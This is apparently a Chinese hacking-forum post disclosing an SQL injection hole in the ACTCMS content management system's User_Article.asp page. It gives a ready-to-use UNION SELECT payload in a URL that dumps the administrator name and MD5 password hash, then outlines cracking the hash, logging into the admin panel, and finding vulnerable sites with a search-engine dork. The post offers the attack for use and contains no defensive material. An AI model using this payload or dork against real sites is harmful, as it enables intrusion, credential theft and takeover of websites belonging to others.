ACTCMS管理系统user_article.asp注入漏洞!
利用方法:1.先注册会员
2。
http://localhost/User/User_Article.Asp?ModeID=1&action=adds&classid=-1'%20union%20select%201,2,3,4,5,admin_name%2B'|'%2Bpassword,7,8,9,10,11,12,13,14,15,16,17,18%20from%20admin_act%20where%20'1'='1
暴出admin的MD5密码
3。破解
4。管理后台是admin/Login.asp
baidu或者gg搜索关键字:inurl:TypeClass.asp
页:
[1]